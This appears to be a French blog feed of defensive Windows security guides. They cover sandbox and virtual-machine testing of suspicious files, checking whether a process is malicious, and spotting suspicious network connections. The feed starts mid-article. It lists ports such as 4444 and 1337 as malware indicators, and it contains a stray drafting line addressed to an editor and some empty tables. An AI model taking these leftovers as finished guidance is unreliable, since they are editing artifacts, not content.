• vérification de la signature numérique

L’analyse permet de :

• détecter des malwares connus
• identifier un fichier suspect
• obtenir un premier niveau de sécurité

C’est une étape rapide, mais limitée.

Le guide complet :

VirusTotal : analyser et scanner un fichier avec plusieurs antivirus (GUIDE COMPLET)

Tester un fichier

Le test consiste à exécuter le fichier dans un environnement isolé, comme une sandbox ou une machine virtuelle.

Cela permet de :

• observer le comportement réel du programme
• détecter des actions suspectes (réseau, fichiers, processus)
• voir l’impact sur le système

Le test va plus loin que l’analyse.

Comparatif rapide

Pourquoi utiliser les deux

Aucune méthode n’est suffisante seule :

• un fichier peut passer l’analyse mais être malveillant
• un test permet de confirmer le comportement

La meilleure approche est de combiner analyse + test.

Tester un fichier avec Windows Sandbox (méthode simple et sécurisée)

Windows Sandbox est la méthode la plus simple pour tester un fichier suspect sans risque sur Windows 11/10.

Il permet d’exécuter un programme dans un environnement isolé :

• sans impact sur votre système principal
• sans installation permanente
• avec suppression automatique après fermeture

C’est idéal pour vérifier le comportement d’un fichier inconnu.

Comment l’utiliser rapidement

Le principe est simple :

• lancez Windows Sandbox
• copiez le fichier à tester
• exécutez-le dans la sandbox
• observez son comportement

Pour le guide complet (activation + utilisation) :

Windows Sandbox : tester un fichier en toute sécurité sur Windows 11/10

Tester un fichier avec une machine virtuelle (VirtualBox)

Une autre méthode consiste à utiliser une machine virtuelle (VM), comme VirtualBox, pour tester un fichier dans un environnement totalement isolé.

Contrairement à Windows Sandbox, la machine virtuelle est :

• persistante (elle garde les modifications)
• plus complète
• adaptée à des tests avancés

Principe de fonctionnement

L’idée est simple :

• installer un Windows dans VirtualBox
• exécuter le fichier suspect dans cette VM
• observer son comportement

Le système principal n’est pas impacté.

VirtualBox permet d’exécuter plusieurs systèmes en parallèle, chacun isolé dans son propre environnement.

Utiliser les snapshots (très important)

Avant de tester un fichier, il est recommandé de créer un snapshot.

Un snapshot est un point de restauration qui permet de revenir à un état précédent de la machine virtuelle

Le workflow idéal :

• installez Windows 11 dans VirtualBox
• créez un snapshot propre
• testez le fichier suspect
• revenez au snapshot après test

Cela permet de nettoyer la VM instantanément.

Quand utiliser VirtualBox

Cette solution est idéale si :

• vous testez régulièrement des fichiers
• vous avez besoin d’un environnement complet
• Windows Sandbox n’est pas disponible

Tutoriel complet :

Comment installer Windows 11 sur VirtualBox

Tester un fichier avec des outils en ligne (VirusTotal, sandbox)

Il est également possible de tester un fichier sans rien installer sur votre PC, en utilisant des services en ligne. Ces plateformes analysent le fichier à distance et permettent d’observer son comportement dans une sandbox.

C’est une solution simple et rapide, idéale pour une première vérification.

Analyse avec VirusTotal

VirusTotal permet d’analyser un fichier avec plusieurs antivirus et propose aussi une analyse comportementale.

Vous pouvez :

• uploader un fichier
• consulter le score de détection
• accéder à l’onglet Behavior pour voir son activité

Guides complets :

• VirusTotal : analyser un fichier avec plusieurs antivirus
• VirusTotal : analyser le comportement d’un malware

Sandbox en ligne

Certains services permettent d’exécuter un fichier dans une sandbox directement depuis le navigateur :

• Any.run
• Hybrid Analysis

Ces outils permettent de :

• voir les actions du programme en temps réel
• analyser les connexions réseau
• détecter des comportements suspects

Ils vont plus loin qu’un simple scan antivirus.

Limites des outils en ligne

Ces solutions présentent toutefois des limites :

• les fichiers envoyés peuvent devenir publics
• certaines analyses sont limitées
• les malwares peuvent détecter l’environnement de test et ne pas exécuter la partie malveillante

Il faut éviter d’y envoyer des fichiers sensibles.

Quelle méthode choisir pour tester un fichier

Voici un tableau récapitulatif des principales méthodes pour tester un fichier en toute sécurité sur Windows 11/10.

Tableau comparatif des méthodes

Comment choisir

Voici le bon réflexe :

• doute léger → VirusTotal
• fichier suspect → Windows Sandbox
• analyse approfondie → VirtualBox
• test rapide sans installation → sandbox en ligne

Limites et précautions pour tester un fichier

Tester un fichier dans un environnement sécurisé réduit fortement les risques, mais ne garantit pas une protection totale. Il est donc important de connaître les limites de ces méthodes et d’adopter les bons réflexes.

Aucune méthode n’est infaillible

Même avec une sandbox ou une machine virtuelle :

• certains malwares peuvent détecter l’environnement virtualisé
• ils peuvent modifier leur comportement pour éviter la détection
• certains programmes malveillants n’agissent qu’après un délai

Un fichier peut donc sembler inoffensif… alors qu’il ne l’est pas réellement.

Risques liés aux outils en ligne

Les services en ligne présentent des contraintes :

• les fichiers envoyés peuvent devenir publics
• certaines analyses sont limitées
• les résultats peuvent être incomplets

Il est déconseillé d’y envoyer des fichiers sensibles ou confidentiels.

Précautions à prendre

Pour tester un fichier en toute sécurité :

• n’utilisez pas de données personnelles dans la sandbox ou la VM
• ne connectez pas de comptes importants
• évitez de copier des fichiers sensibles
• surveillez le comportement du programme

Le test doit rester un environnement d’observation.

Ne pas se reposer uniquement sur une méthode

Tester un fichier est une étape importante, mais doit être complétée :

• par une analyse antivirus
• par VirusTotal
• par la vérification de la signature

Multiplier les méthodes permet d’obtenir un diagnostic plus fiable.

Ressources utiles et articles liés

Comment vérifier si ordinateur a été hacké ou piraté ?

• Comment analyser un fichier téléchargé et vérifier s’il est dangereux (virus, malware)
• Comment vérifier si un processus est légitime ou malveillant sous Windows 11/10
• Comment vérifier un lien internet : malveillant ou sain ?
• Comment savoir si quelqu’un s’est connecté à votre ordinateur
• Comment savoir si quelqu’un contrôle mon PC a distance
• Comment savoir ce qui a été fait sur un ordinateur et vérifier l’activité récente de son PC
• Comment vérifier si le PC a été piraté ou hacké
• VirusTotal : scanner/analyser un fichier avec plusieurs antivirus
• Shouldiclick : Vérifier si un site est malveillant

• Comment protéger son PC des virus et des pirates ?

L’article Comment tester un fichier en toute sécurité sur Windows 11/10 (sandbox, machine virtuelle) est apparu en premier sur malekal.com.

Un processus inconnu dans le Gestionnaire des tâches, un nom étrange, une forte utilisation CPU ou une activité réseau inhabituelle peuvent susciter des inquiétudes.

Sous Windows 11/10, des dizaines de processus légitimes s’exécutent en arrière-plan. Mais un malware peut se dissimuler derrière un nom trompeur pour passer inaperçu.

Pour déterminer si un processus est légitime ou malveillant, il faut analyser plusieurs éléments : son emplacement, sa signature numérique, son comportement, sa persistance et son éventuelle détection par des antivirus.

Ce guide vous donne une méthode claire pour vérifier un processus suspect sans supprimer par erreur un composant système légitime.

En parallèle ; si vous suspectez une infection globale, consultez ce guide : Comment savoir si votre PC est infecté par un virus sous Windows 11/10 ?

Comment identifier un processus suspect sous Windows 11/10

Un virus ou un autre logiciel malveillant s’exécute généralement sous la forme d’un processus actif en arrière-plan. Examiner les processus en cours d’exécution sous Windows 11/10 est donc une étape essentielle pour déterminer si votre PC est infecté.

L’objectif est d’identifier un programme inhabituel, mal nommé ou incohérent avec votre utilisation.

Examiner les processus avec le Gestionnaire des tâches

Pour afficher les processus actifs :

• Ouvrez le gestionnaire de tâches par un clic droit sur le menu Démarrer ou utilisez le raccourci clavier + X
• Puis Gestionnaire des tâches. Vous pouvez aussi utiliser le raccourci clavier CTRL+MAJ+ESC
• Ouvrez l’onglet Processus
• Cliquez sur Plus de détails si nécessaire

Vérifiez :

• Les programmes que vous ne reconnaissez pas
• Une utilisation CPU ou disque anormalement élevée
• Un nom étrange ou mal orthographié

Un processus consommant beaucoup de ressources alors que vous n’utilisez aucun logiciel lourd peut être suspect.

Identifier le processus exact (onglet Détails)

Pour une analyse plus précise :

• Ouvrez l’onglet Détails
• Notez le nom exact du processus
• Vérifiez le PID si nécessaire

Les malwares utilisent parfois un nom proche d’un processus système légitime (ex : svch0st.exe au lieu de svchost.exe).

Vérifier l’emplacement du fichier

Pour contrôler où se trouve le programme :

• Faites un clic droit sur le processus
• Cliquez sur Ouvrir l’emplacement du fichier

Un fichier situé dans :

• C:\Windows\System32
• C:\Program Files

est généralement légitime.

En revanche, un exécutable placé dans :

• AppData
• Temp
• Un dossier au nom aléatoire

mérite une analyse approfondie.

Vérifier la signature numérique

Pour savoir si un fichier est signé :

• Faites un clic droit sur le fichier
• Cliquez sur Propriétés
• Ouvrez l’onglet Signatures numériques

Une signature valide provenant de Microsoft ou d’un éditeur reconnu est rassurante.
L’absence de signature n’est pas forcément malveillante, mais elle doit inciter à la prudence.

Signature numérique des fichiers sur Windows et sécurité

Analyser un processus suspect avec VirusTotal

Si un processus vous semble suspect (nom inhabituel, forte utilisation CPU, comportement étrange), vous pouvez analyser son fichier exécutable avec VirusTotal, un service en ligne qui vérifie un fichier à l’aide de dizaines de moteurs antivirus.

Pour analyser un processus :

• Faites un clic droit sur le processus dans le Gestionnaire des tâches
• Cliquez sur Ouvrir l’emplacement du fichier
• Copiez le fichier exécutable
• Téléversez-le sur VirusTotal

VirusTotal affiche un résultat du type :

0/70 → Aucun moteur ne détecte le fichier
5/70 → 5 moteurs signalent un problème

Plus le nombre de détections est élevé, plus le risque est important.

Pour un guide détaillé expliquant :

• Comment utiliser VirusTotal
• Comment interpréter les résultats
• Comment analyser un hash au lieu d’un fichier
• Comment vérifier une URL suspecte

Consultez le guide complet : VirusTotal : analyser et scanner des fichiers avec plusieurs antivirus

Analyser automatiquement les processus avec VirusTotal via Process Explorer

Plutôt que de vérifier manuellement chaque fichier suspect, vous pouvez utiliser Process Explorer (outil Microsoft Sysinternals) pour analyser automatiquement les processus actifs via VirusTotal.

Process Explorer est un gestionnaire des tâches avancé qui permet notamment :

• D’afficher l’arborescence complète des processus
• De vérifier les signatures numériques
• D’analyser automatiquement les exécutables en ligne

Pour l’utiliser :

• Téléchargez et lancez Process Explorer :

• Cliquez sur Options
• Activez Check VirusTotal.com
• Acceptez les conditions d’utilisation

Une nouvelle colonne VirusTotal apparaît alors avec un score du type 0/75.

Ce score indique :

• Le nombre de moteurs antivirus ayant détecté le fichier
• Le nombre total de moteurs utilisés

Un résultat 0/75 est généralement rassurant.
Un score élevé (par exemple 10/75 ou plus) doit attirer votre attention.

Pour un guide détaillé d’utilisation, consultez : Process Explorer : gestionnaire des tâches avancé

Vérifier la persistance d’un processus suspect

Un processus malveillant ne se contente pas d’être actif.
Il tente généralement de se relancer automatiquement après un redémarrage.

Si vous suspectez un processus précis, vous devez vérifier s’il est configuré pour démarrer automatiquement.

Vérifier si le processus est présent au démarrage

• Ouvrez le Gestionnaire des tâches
• Cliquez sur l’onglet Démarrage
• Recherchez le nom exact du processus suspect

S’il apparaît dans la liste avec un statut Activé, cela peut indiquer une tentative de persistance.

Vérifier les tâches planifiées liées au processus

• Appuyez sur Windows + R
• Tapez taskschd.msc
• Recherchez une tâche qui lance le même fichier exécutable

Ouvrez la tâche et vérifiez le chemin du programme exécuté.

Si la tâche lance précisément le fichier suspect, cela confirme une persistance programmée.

Vérifier s’il est installé comme service

• Appuyez sur Windows + R
• Tapez msconfig
• Allez dans l’onglet Services
• Cochez « Masquer tous les services Microsoft« 
• Vérifier si un service inconnu ou suspicieux est présent

Analyser un processus avec Process Explorer et Autoruns

Le Gestionnaire des tâches de Windows 11/10 permet une première analyse, mais il reste limité. Pour examiner en profondeur un processus suspect ou détecter une persistance cachée, il est recommandé d’utiliser des outils avancés de Microsoft Sysinternals.

Deux outils sont particulièrement utiles : Process Explorer et Autoruns.

Analyser un processus en détail avec Process Explorer

Process Explorer est un gestionnaire des tâches avancé qui fournit beaucoup plus d’informations que l’outil intégré à Windows.

Il permet notamment de :

• Voir l’arborescence complète des processus
• Identifier le processus parent
• Vérifier la signature numérique en temps réel
• Consulter les DLL chargées
• Interroger automatiquement VirusTotal

Pour l’utiliser :

• Téléchargez et lancez Process Explorer
• Recherchez le processus suspect
• Vérifiez la colonne Verified Signer
• Activez l’option Check VirusTotal.com dans le menu Options

Un processus non signé, situé dans un dossier inhabituel et signalé par VirusTotal mérite une analyse approfondie.

Guide détaillé : Process Explorer : gestionnaire des tâches avancé

Détecter la persistance avec Autoruns

Si vous suspectez qu’un processus malveillant se relance automatiquement, Autoruns est l’outil le plus complet pour analyser les mécanismes de démarrage.

Il affiche :

• Les programmes au démarrage
• Les services
• Les tâches planifiées
• Les pilotes
• Les extensions navigateur
• Les clés de registre liées au lancement automatique

Autoruns permet d’identifier des éléments que le Gestionnaire des tâches ne montre pas.

Pour analyser :

• Lancez Autoruns
• Recherchez le nom du processus suspect
• Vérifiez le chemin du fichier
• Contrôlez la signature numérique

Un élément au nom étrange, non signé et situé dans AppData ou Temp doit être examiné avec prudence.

Guide détaillé :Autoruns : analyser et désactiver les programmes au démarrage de Windows

Quand faut-il réellement s’inquiéter ?

Un processus inconnu ne signifie pas automatiquement qu’il est malveillant. Windows 11/10 exécute de nombreux services en arrière-plan, dont certains portent des noms peu explicites. Il est donc important de ne pas paniquer au premier doute.

En revanche, certains signaux doivent réellement vous alerter, surtout lorsqu’ils se cumulent.

Combinaison de plusieurs indicateurs suspects

Vous devez commencer à vous inquiéter si le processus présente plusieurs des caractéristiques suivantes :

Un seul critère isolé ne suffit généralement pas. C’est la combinaison de plusieurs éléments qui doit attirer votre attention.

Le processus réapparaît après suppression

Si vous tentez de :

• Terminer le processus
• Supprimer le fichier
• Désactiver son démarrage

et qu’il réapparaît automatiquement, cela peut indiquer :

• Une persistance installée (tâche planifiée, service, clé registre)
• Une infection plus avancée
• Un malware actif en mémoire

Dans ce cas, une analyse plus poussée est nécessaire.

Modifications système associées

Un processus devient particulièrement suspect s’il s’accompagne de :

• Désactivation de l’antivirus
• Modification des paramètres proxy
• Ajout d’un compte administrateur
• Redirections navigateur

Ces comportements sont plus caractéristiques d’un malware que d’un simple programme mal configuré.

Signes complémentaires d’infection

Vous devez également vous inquiéter si le processus suspect est lié à :

• Des fichiers chiffrés (ransomware)
• Une activité réseau constante au repos
• L’impossibilité d’accéder à des sites de sécurité
• Des messages d’erreur inhabituels au démarrage

Que faire si le processus est malveillant ?

Si vos vérifications confirment qu’un processus est réellement malveillant sous Windows 11/10, il est important d’agir avec méthode. Supprimer un fichier au hasard ou forcer l’arrêt d’un processus sans analyse peut rendre le système instable.

Voici les étapes à suivre.

Isoler temporairement le PC du réseau

Si le processus communique vers l’extérieur :

• Déconnectez le Wi-Fi
• Débranchez le câble Ethernet

Cela limite les communications avec un serveur distant (exfiltration de données, réception d’instructions).

Mettre fin au processus suspect

Dans un premier temps :

• Ouvrez le Gestionnaire des tâches
• Sélectionnez le processus
• Cliquez sur Fin de tâche

Si le processus refuse de se fermer ou se relance immédiatement, cela peut indiquer une persistance active.

Vous pouvez tenter de supprimer le fichier en mode sans échec : comment démarrer Windows en mode sans échec

Supprimer le fichier malveillant

Après avoir arrêté le processus :

• Faites un clic droit sur le fichier
• Supprimez-le
• Videz la corbeille

Effectuer une analyse antivirus complète

Même si vous avez identifié le fichier, il est indispensable d’effectuer une analyse complète du système :

• Lancez une analyse complète avec Microsoft Defender
• Utilisez un outil de seconde opinion comme Malwarebytes

Cela permet de détecter :

• D’autres composants liés
• Une éventuelle persistance
• Des modifications système associées

Le guide à suivre : Supprimer les virus et désinfecter son PC

L’article Comment vérifier si un processus est légitime ou malveillant sous Windows 11/10 est apparu en premier sur malekal.com.

Votre PC communique en permanence avec Internet. Mises à jour, antivirus, navigateur, services cloud… sous Windows 11/10, une activité réseau est normale, même lorsque vous n’utilisez pas activement votre ordinateur.

Mais comment savoir si ce trafic est légitime… ou s’il s’agit d’une activité réseau suspecte liée à un virus, un cheval de Troie ou une tentative de piratage ?

Beaucoup d’utilisateurs s’inquiètent en découvrant des connexions vers des adresses IP inconnues, des ports inhabituels ou un trafic important au repos. Pourtant, toutes les connexions étrangères ne sont pas malveillantes. L’enjeu est de savoir faire la différence entre une communication normale du système et un comportement réellement anormal.

Dans ce guide complet, vous allez apprendre à :

• Distinguer une activité réseau normale d’un comportement suspect
• Identifier les signes qui doivent réellement alerter
• Analyser une adresse IP distante (Whois, ASN, géolocalisation)
• Utiliser des outils comme TCPView pour surveiller les connexions en temps réel
• Savoir quand il faut réellement s’inquiéter

L’objectif est simple : vous donner une méthode claire et accessible pour détecter une activité réseau suspecte sous Windows 11/10, sans tomber dans la paranoïa… mais sans ignorer un véritable problème de sécurité.

Activité réseau normale vs activité suspecte : comment faire la différence sous Windows 11/10 ?

Sous Windows 11/10, votre ordinateur communique en permanence avec Internet et votre réseau local. Cette activité réseau n’est pas forcément synonyme de piratage. Entre les mises à jour de Windows, la synchronisation du compte Microsoft, les navigateurs web, les logiciels de sécurité et les applications en arrière-plan, il est parfaitement normal d’observer du trafic, même lorsque vous n’utilisez pas activement votre PC.

Une activité réseau normale présente généralement les caractéristiques suivantes : connexions vers des serveurs connus (Microsoft, Google, éditeurs de logiciels), ports standards (80, 443, 53), volumes de données cohérents avec l’usage en cours (navigation web, streaming, mise à jour). Les processus impliqués sont identifiables et légitimes, comme svchost.exe, msedge.exe ou votre antivirus.

À l’inverse, une activité réseau anormale ou suspecte peut se distinguer par des connexions vers des adresses IP inconnues, des pays inhabituels, des ports non standards, ou un trafic important alors que le PC est au repos. Ce type de comportement peut être lié à un logiciel malveillant, un cheval de Troie, un mineur de cryptomonnaie ou un outil de contrôle à distance.

La différence entre activité normale et anormale ne repose donc pas uniquement sur le volume de trafic, mais sur le contexte, la cohérence avec votre usage et l’identification des processus impliqués. L’objectif n’est pas de supprimer toute communication réseau, mais de savoir reconnaître ce qui est habituel… et ce qui ne l’est pas.

Signes d’une activité réseau suspecte (trafic au repos, IP inconnue, ports inhabituels)

Certaines situations doivent attirer votre attention lorsque vous analysez l’activité réseau de votre PC sous Windows 11/10. Un comportement isolé n’est pas toujours synonyme d’infection, mais plusieurs signaux combinés peuvent indiquer une activité réseau suspecte.

Trafic réseau important alors que le PC est au repos

Si vous constatez un trafic sortant ou entrant élevé alors que vous n’utilisez aucune application (pas de téléchargement, pas de streaming, pas de mise à jour en cours), cela peut être anormal.

Pour vérifier cela :

• Ouvrez le Gestionnaire des tâches (Ctrl + Maj + Échap)
• Cliquez sur l’onglet Performances
• Sélectionnez Ethernet ou Wi-Fi
• Observez l’activité réseau en temps réel

Un débit constant alors que le système est inactif peut révéler un logiciel qui communique en arrière-plan sans raison évidente.

Vous pouvez aussi consulter le Moniteur de ressources via le guide complet : Moniteur de ressources Windows : comprendre les ressources du système (CPU, mémoire, disque ou réseau)

Connexions vers des adresses IP inconnues ou inhabituelles

Une connexion vers une adresse IP étrangère n’est pas forcément suspecte. De nombreux services utilisent des serveurs répartis dans le monde entier. Toutefois, vous devez vous poser des questions si :

• L’adresse IP n’est associée à aucun service connu
• Le pays de destination est inhabituel par rapport à votre usage
• Les connexions sont répétées et persistantes
• Le processus à l’origine de la connexion est inconnu

Vous pouvez consulter ce guide pour notamment utiliser le moniteur de ressources de Windows ou TCPView : Comment lister les connexions réseau actives sous Windows 11/10 (IP, ports et processus)

Pour identifier les connexions actives et pouvoir les copier/coller très facilement :

• Ouvrez l’invite de commandes
• Tapez :

netstat -ano

• Relevez l’adresse IP distante et le PID
• Faites correspondre le PID avec le processus dans le Gestionnaire des tâches

Utiliser netstat pour lister les connexions et les ports ouverts sur Windows (TCP/UDP)

Utilisation de ports inhabituels ou non standards

La majorité des communications réseau classiques utilisent des ports standards :

• 80 (HTTP)
• 443 (HTTPS)
• 53 (DNS)
• 25 / 587 (SMTP)

Si vous observez des connexions actives sur des ports élevés ou inhabituels (par exemple 4444, 1337, 5555, etc.), surtout en écoute permanente, cela peut être le signe d’un logiciel malveillant, d’un outil de contrôle à distance ou d’un service non désiré.

Pour comprendre les ports réseau et leur rôle : Liste des ports réseaux de connexion et fonctionnement

Un port ouvert n’est pas automatiquement dangereux, mais un port ouvert associé à un processus inconnu doit toujours être analysé.

En résumé, ce n’est pas un seul élément qui doit vous inquiéter, mais la combinaison de trafic anormal, IP inconnue et port inhabituel. C’est l’analyse globale du comportement réseau qui permet de déterminer s’il s’agit d’une activité légitime… ou d’un risque réel.

Analyser une adresse IP suspecte (Whois, ASN, géolocalisation)

Lorsque vous identifiez une adresse IP distante suspecte dans netstat, le Moniteur de ressources ou TCPView, l’objectif est de déterminer :

• À qui appartient cette IP
• Dans quel pays elle est localisée
• À quel réseau (ASN) elle est rattachée
• Si elle correspond à un service légitime

Avant d’utiliser un outil d’analyse, il est important de comprendre quelles informations peuvent être obtenues à partir d’une adresse IP et à quoi elles correspondent réellement.

Informations que l’on peut obtenir à partir d’une adresse IP

Ces données permettent de répondre à plusieurs questions essentielles :

• Cette IP appartient-elle à un fournisseur connu ?
• Correspond-elle à un service que vous utilisez ?
• Est-elle rattachée à un hébergeur cloud légitime ?
• Plusieurs connexions suspectes proviennent-elles du même ASN ?

Il est important de comprendre que la géolocalisation IP est approximative. Elle ne permet pas d’identifier une personne précise, mais uniquement un réseau ou un centre de données.

Une fois ces notions comprises, vous pouvez passer à l’analyse concrète d’une adresse IP avec un outil comme BrowserLeaks.

Utiliser BrowserLeaks pour analyser une adresse IP

Le site BrowserLeaks ne sert pas uniquement à afficher votre IP publique. Il permet également d’analyser une adresse IP distante et d’obtenir des informations détaillées.
Pour plus d’informations sur ce site, vous pouvez consulter le guide : BrowserLeaks : afficher son adresse IP et tester les fuites du navigateur WEB

Voici comment procéder :

• Copiez l’adresse IP distante trouvée dans netstat ou TCPView
• Ouvrez le site BrowserLeaks. Vous pouvez utiliser directement le lien : https://browserleaks.com/ip/[ip]
• Rendez-vous dans la section d’analyse d’adresse IP
• Collez l’adresse IP dans le champ prévu
• Lancez la recherche

Vous obtiendrez alors :

• Le pays et la ville estimée (géolocalisation)
• Le fournisseur d’accès ou l’hébergeur
• L’ASN (Autonomous System Number)
• Le nom de l’organisation propriétaire

Ces informations permettent déjà de savoir si vous êtes face à :

• Un grand fournisseur cloud (Microsoft, Google, Amazon, OVH, Cloudflare…)
• Un opérateur télécom
• Un hébergeur VPS
• Un réseau inconnu ou suspect

Si l’IP appartient à Microsoft ou à un service cloud utilisé par Windows 11/10, il s’agit très probablement d’une activité normale. En revanche, si elle pointe vers un hébergeur inconnu sans rapport avec vos logiciels installés, l’analyse doit continuer.

Interpréter correctement les résultats

Il est important de ne pas tirer de conclusion hâtive.

Une IP localisée en Russie, aux États-Unis ou en Asie n’est pas automatiquement malveillante. Les services cloud utilisent des centres de données internationaux.

Ce qui doit vous alerter, c’est une incohérence entre :

• Le processus local à l’origine de la connexion
• Le port utilisé
• Le type de service attendu
• Le fournisseur réseau identifié

C’est la cohérence globale qui compte, pas la géolocalisation seule.

Surveiller les connexions réseau suspectes en temps réel

Analyser une IP ponctuellement est utile. Mais pour détecter une activité réseau suspecte persistante, il est préférable de surveiller les connexions en temps réel.

Plusieurs outils sous Windows 11/10 permettent cela.

TCPView : visualiser les connexions actives et faire un Whois

TCPView (outil Microsoft Sysinternals) affiche en temps réel :

• Les connexions TCP et UDP actives
• Les adresses IP locales et distantes
• Les ports utilisés
• Le processus à l’origine de la connexion

L’avantage est que vous pouvez :

• Identifier immédiatement quel programme communique
• Observer l’apparition de nouvelles connexions
• Faire un Whois directement depuis l’outil (Menu Connection > Whois)

C’est l’un des outils les plus efficaces pour détecter un comportement anormal.

Le guide complet : TCPView : lister les connexions réseaux et ports ouverts sur Windows

GlassWire : visualiser les connexions par pays et par application

GlassWire propose une interface graphique plus accessible. Il permet :

• De voir quelles applications utilisent Internet
• D’identifier les connexions par pays (avec drapeaux)
• D’être alerté lors d’une nouvelle connexion inconnue

Cela permet de repérer facilement une connexion inhabituelle vers un pays inattendu ou un programme qui communique sans raison.

Le guide complet : GlassWire : pare-feu gratuit et simple

Portmaster : classifier et contrôler les connexions

Portmaster va plus loin en classifiant les connexions :

• Connexions système
• Connexions applicatives
• Connexions vers trackers ou services tiers
• Connexions suspectes

Il permet également de bloquer des connexions spécifiques, ce qui peut être utile si vous identifiez un comportement douteux.

Le tutoriel : Portmaster – un pare-feu pour Windows et Linux

En résumé

En combinant :

• L’analyse d’IP via BrowserLeaks
• La surveillance en temps réel avec TCPView
• Une visualisation simplifiée avec GlassWire
• Une classification avancée avec Portmaster

Vous disposez d’une méthode complète pour distinguer une activité réseau normale d’une activité réellement suspecte.

Activités réseau légitimes souvent confondues avec un piratage

Avant de conclure à une activité réseau suspecte sous Windows 11/10, il est essentiel de vérifier si le trafic observé correspond simplement au fonctionnement normal du système ou d’un logiciel installé.

Le tableau ci-dessous résume les situations les plus courantes.

Activités réseau normales souvent confondues avec un piratage

Points importants à retenir

Une IP étrangère n’est pas forcément malveillante.
Un trafic au repos n’est pas forcément anormal.
Un processus système actif n’est pas forcément suspect.

Ce qui doit réellement vous alerter, c’est :

• Une incohérence entre le processus et l’activité
• Un exécutable inconnu ou situé dans un dossier inhabituel
• Un trafic important sans raison logique
• Une connexion persistante vers un réseau inconnu

C’est l’analyse globale du comportement qui permet de distinguer une activité normale d’un véritable problème de sécurité.

Quand faut-il réellement s’inquiéter ?

Observer une activité réseau inhabituelle ne signifie pas automatiquement que votre PC est piraté. Sous Windows 11/10, de nombreux services communiquent en arrière-plan. La vraie question n’est donc pas « y a-t-il du trafic ? » mais plutôt : ce trafic est-il cohérent et légitime ?

Il faut commencer à s’inquiéter lorsque plusieurs signaux suspects apparaissent en même temps.

Combinaison de signaux anormaux

Un seul indicateur isolé (IP étrangère, port élevé, trafic au repos) n’est généralement pas suffisant. En revanche, la combinaison des éléments suivants doit attirer votre attention :

• Processus inconnu ou au nom suspect
• Exécutable situé dans AppData ou Temp
• Absence de signature numérique
• Connexions persistantes vers un hébergeur inconnu
• Utilisation de ports inhabituels
• Trafic important alors que le PC est inactif

Plus ces critères s’accumulent, plus le risque d’activité malveillante augmente.

Connexions chiffrées vers des IP inconnues avec trafic constant

Un logiciel malveillant moderne communique souvent via HTTPS (port 443), ce qui le rend moins visible. Si vous observez :

• Une connexion chiffrée persistante
• Un volume de données régulier
• Un processus qui ne correspond à aucun logiciel installé

il devient légitime d’approfondir l’analyse.

Le chiffrement ne signifie pas que l’activité est malveillante, mais une connexion chiffrée constante sans justification claire doit être examinée.

Les sites HTTPs : pourquoi sont-ils sécurisés ?

Apparition de nouveaux processus après le démarrage

Si un processus inconnu apparaît à chaque redémarrage et établit immédiatement une connexion réseau, cela peut indiquer :

• Un logiciel installé sans votre consentement
• Un programme ajouté au démarrage
• Un malware persistant

Vous pouvez vérifier les éléments au démarrage via :

• Ouvrir le Gestionnaire des tâches
• Aller dans l’onglet Démarrage
• Identifier les programmes inconnus

Modification des paramètres système ou réseau

Vous devez également vous inquiéter si l’activité réseau suspecte s’accompagne de :

• Désactivation de l’antivirus
• Modification des paramètres proxy
• Ajout d’un pare-feu ou d’une règle inconnue
• Création d’un nouveau compte utilisateur

Ces changements sont souvent associés à une compromission plus avancée.

Signes complémentaires d’un PC compromis

Une activité réseau malveillante est souvent accompagnée de symptômes visibles :

• Ralentissements importants
• Utilisation CPU ou disque anormale
• Fenêtres publicitaires ou redirections
• Programmes inconnus installés
• Alertes de sécurité répétées

C’est l’association entre comportement réseau suspect et anomalies système qui doit réellement vous alerter.

En résumé, vous devez réellement vous inquiéter lorsque :

• L’activité réseau est incohérente avec votre usage
• Le processus à l’origine est douteux
• Plusieurs indicateurs techniques convergent
• Des modifications système apparaissent sans votre action

Dans ce cas, il ne s’agit plus d’une simple curiosité technique, mais potentiellement d’un incident de sécurité qui nécessite une réaction adaptée.

Voici le paragraphe « Aller plus loin » que tu peux insérer à la suite de celui que l’on vient d’écrire. Il introduit de manière claire les deux guides pour approfondir l’analyse de l’état de l’ordinateur.

Aller plus loin : vérifier si votre PC est réellement compromis

Si après avoir analysé l’activité réseau, confirmé l’origine des processus et exécuté des analyses antivirus vous avez toujours un doute, il est recommandé d’aller plus loin dans l’examen de votre ordinateur. Une activité réseau suspecte peut parfois être le symptôme d’un problème plus large, comme une compromission du système ou la présence de logiciels indésirables.

Pour vous aider à approfondir l’analyse et déterminer avec plus de certitude si votre PC sous Windows 11/10 a été piraté ou infecté, vous pouvez consulter ces deux guides complets :

• Comment savoir si votre ordinateur a été hacké/piraté ?
  Ce guide vous décrit les signes typiques d’un PC compromis, comment les identifier et quelles actions entreprendre pour confirmer une compromission. Il couvre les indicateurs visibles dans le système, les comportements anormaux et les éléments à surveiller dans le journal des événements.
• Comment savoir si votre PC est infecté par un virus ?
  Ce second guide se concentre sur les méthodes pour détecter une infection par un virus ou un logiciel malveillant, en vous fournissant des outils, des étapes de diagnostic et des conseils pour analyser et nettoyer votre système efficacement.

En combinant l’analyse réseau expliquée dans cet article avec ces deux guides spécialisés, vous disposez d’une approche complète pour :

• Vérifier l’intégrité de votre système
• Identifier des signes de compromission ou d’infection
• Prendre des mesures appropriées en fonction des résultats

Ces ressources vous permettent de passer d’une simple observation réseau à une vraie analyse de sécurité globale de votre PC.

Que faire si vous suspectez une activité malveillante ?

Si, après analyse, vous pensez être face à une activité réseau malveillante sous Windows 11/10, il est important d’agir méthodiquement. L’objectif n’est pas de paniquer, mais de limiter les risques, conserver des éléments d’analyse et sécuriser le système.

Isoler temporairement le PC du réseau

La première mesure de précaution consiste à empêcher toute communication suspecte.

• Déconnectez le câble Ethernet
• Désactivez le Wi-Fi depuis Paramètres → Réseau et Internet
• Évitez d’éteindre brutalement le PC si vous souhaitez analyser les connexions en cours

Isoler la machine permet d’éviter l’exfiltration de données ou la réception de nouvelles instructions depuis un serveur distant.

Identifier précisément le processus suspect

Avant toute suppression, vous devez confirmer le programme à l’origine de l’activité.

• Ouvrez le Gestionnaire des tâches
• Repérez le processus concerné
• Faites un clic droit → Ouvrir l’emplacement du fichier
• Vérifiez la signature numérique
• Analysez le fichier avec VirusTotal

Ne supprimez jamais un fichier système sans vérification. Une suppression inappropriée peut rendre Windows instable.

Effectuer une analyse complète avec l’antivirus

Lancez une analyse approfondie du système.

• Ouvrez Sécurité Windows
• Cliquez sur Protection contre les virus et menaces
• Sélectionnez Options d’analyse
• Lancez une Analyse complète

Si vous utilisez un antivirus tiers, effectuez également une analyse complète depuis son interface.

